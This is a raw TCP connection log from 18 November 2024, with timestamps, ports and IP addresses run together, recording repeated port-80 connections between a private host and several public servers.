                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.135930061 CET805016918.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.136014938 CET5016980192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.143325090 CET5017280192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.148475885 CET805017218.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.148614883 CET5017280192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.148765087 CET5017280192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.148782969 CET5017280192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.153587103 CET805017218.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.153614044 CET805017218.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.838728905 CET805017218.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.839075089 CET5017280192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.844985962 CET805017218.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.845048904 CET5017280192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.851953983 CET5017380192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.856913090 CET8050173172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.856993914 CET5017380192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.857065916 CET5017380192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.857079029 CET5017380192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.862067938 CET8050173172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.862080097 CET8050173172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.980561972 CET805017147.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.980956078 CET5017180192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.986433029 CET805017147.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.986504078 CET5017180192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.993974924 CET5017480192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.998956919 CET805017444.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:11.863823891 CET5018180192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:11.863823891 CET5018180192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:11.868697882 CET805018134.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:11.868724108 CET805018134.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:12.703841925 CET805018134.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:12.704411030 CET5018180192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:12.709736109 CET805018134.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:12.709834099 CET5018180192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:12.726866961 CET5018280192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:12.732564926 CET805018234.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:12.732641935 CET5018280192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:12.732754946 CET5018280192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:12.732779980 CET5018280192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:12.738445997 CET805018234.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:12.738457918 CET805018234.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:12.914818048 CET805018018.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:12.926232100 CET5018080192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:12.931683064 CET805018018.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:12.931888103 CET5018080192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:12.940798044 CET5018380192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:12.945657969 CET805018318.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:12.945842028 CET5018380192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:12.946000099 CET5018380192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:12.946026087 CET5018380192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:12.950884104 CET805018318.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:12.950896025 CET805018318.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:13.566540003 CET805018234.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:13.572609901 CET5018280192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:13.580477953 CET805018234.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:13.580704927 CET5018280192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:13.588514090 CET5018480192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:13.596055031 CET805018434.246.200.160192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:13.596142054 CET5018480192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:13.596246004 CET5018480192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:13.596271992 CET5018480192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:13.603769064 CET805018434.246.200.160192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:13.604259968 CET805018434.246.200.160192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:13.629043102 CET805018318.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:13.629345894 CET5018380192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:13.638571978 CET805018318.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:13.639337063 CET5018380192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:14.242816925 CET5018580192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:14.247899055 CET805018544.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:14.247992992 CET5018580192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:14.248141050 CET5018580192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:14.248157978 CET5018580192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:14.253123999 CET805018544.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:14.253329039 CET805018544.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:14.568742990 CET805018434.246.200.160192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:14.568945885 CET5018480192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:14.574595928 CET805018434.246.200.160192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:14.574672937 CET5018480192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:14.585119963 CET5018680192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:14.590596914 CET805018618.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:14.593787909 CET5018680192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:14.593899965 CET5018680192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:18.411458015 CET805019318.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.078608990 CET805019318.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.101706028 CET5019380192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.107346058 CET805019318.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.107398033 CET5019380192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.112607002 CET5019480192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.117618084 CET805019444.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.117712975 CET5019480192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.117769957 CET5019480192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.117784977 CET5019480192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.123814106 CET805019444.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.123832941 CET805019444.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.248840094 CET805019218.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.249016047 CET5019280192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.254347086 CET805019218.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.254455090 CET5019280192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.263633013 CET5019580192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.279548883 CET805019518.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.279623985 CET5019580192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.279768944 CET5019580192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.279788971 CET5019580192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.288939953 CET805019518.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.288953066 CET805019518.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.449707985 CET5019580192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.452744961 CET5019680192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.457714081 CET805019618.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.457798004 CET5019680192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.457920074 CET5019680192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.457938910 CET5019680192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.462759972 CET805019618.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.462845087 CET805019618.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.772728920 CET805019444.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.794004917 CET5019480192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.799952984 CET805019444.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.800051928 CET5019480192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.805905104 CET5019780192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.810894012 CET805019718.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.810962915 CET5019780192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.811064959 CET5019780192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.811077118 CET5019780192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.816080093 CET805019718.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.816093922 CET805019718.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:20.297403097 CET805019618.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:20.298496962 CET5019680192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:20.304075956 CET805019618.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:20.304194927 CET5019680192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:20.364990950 CET5019880192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:20.373481035 CET805019834.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:20.373547077 CET5019880192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:20.374056101 CET5019880192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:20.374082088 CET5019880192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:20.382584095 CET805019834.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:20.383112907 CET805019834.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:20.478382111 CET805019718.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:20.479429007 CET5019780192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:24.249586105 CET5020580192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:24.250164986 CET805020434.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:24.250334978 CET5020480192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:24.254515886 CET805020518.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:24.254528046 CET805020518.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:24.258244038 CET805020434.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:24.258299112 CET5020480192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:24.265690088 CET5020680192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:24.270724058 CET805020644.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:24.270792961 CET5020680192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:24.270921946 CET5020680192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:24.270942926 CET5020680192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:24.276076078 CET805020644.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:24.276087046 CET805020644.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:24.935749054 CET805020644.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:24.940337896 CET5020680192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:24.945693970 CET805020644.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:24.947114944 CET5020680192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:25.040327072 CET5020780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:25.045502901 CET805020754.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:25.045568943 CET5020780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:25.061970949 CET5020780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:25.062000990 CET5020780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:25.067070961 CET805020754.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:25.067163944 CET805020754.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:25.084543943 CET805020518.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:25.098588943 CET5020580192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:25.104300976 CET805020518.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:25.104351997 CET5020580192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:25.162497997 CET5020880192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:25.168745041 CET805020818.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:25.168808937 CET5020880192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:25.191273928 CET5020880192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:25.191308022 CET5020880192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:25.197149038 CET805020818.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:25.197160959 CET805020818.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:25.903992891 CET805020754.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:25.949634075 CET5020780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:26.023777962 CET805020754.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:26.023907900 CET5020780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:26.496375084 CET5020780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:26.502466917 CET805020754.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:26.639918089 CET805020818.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:26.644614935 CET5020880192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:26.650114059 CET805020818.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:26.650182962 CET5020880192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:26.709284067 CET5020980192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:26.714767933 CET805020935.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:26.714845896 CET5020980192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:26.725158930 CET5020980192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:26.725194931 CET5020980192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:26.730187893 CET805020935.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:26.730201960 CET805020935.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:26.754843950 CET5021080192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:26.760287046 CET805021047.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:30.832470894 CET805021754.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:30.832545042 CET5021780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:30.832655907 CET5021780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:30.832683086 CET5021780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:30.837713003 CET805021754.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:30.837735891 CET805021754.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.086834908 CET805021618.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.086991072 CET5021680192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.093085051 CET805021618.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.093141079 CET5021680192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.099014997 CET5021880192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.103921890 CET805021818.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.104008913 CET5021880192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.104089022 CET5021880192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.104096889 CET5021880192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.109232903 CET805021818.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.109244108 CET805021818.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.449923992 CET5021780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.453860044 CET5021980192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.460361958 CET805021954.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.460453033 CET5021980192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.460719109 CET5021980192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.460747957 CET5021980192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.468554974 CET805021954.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.468569994 CET805021954.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.776149035 CET805021818.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.776381969 CET5021880192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.782356977 CET805021818.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.782422066 CET5021880192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.789462090 CET5022080192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.794532061 CET805022044.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.794603109 CET5022080192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.794714928 CET5022080192.168.2.1044.221.84.105
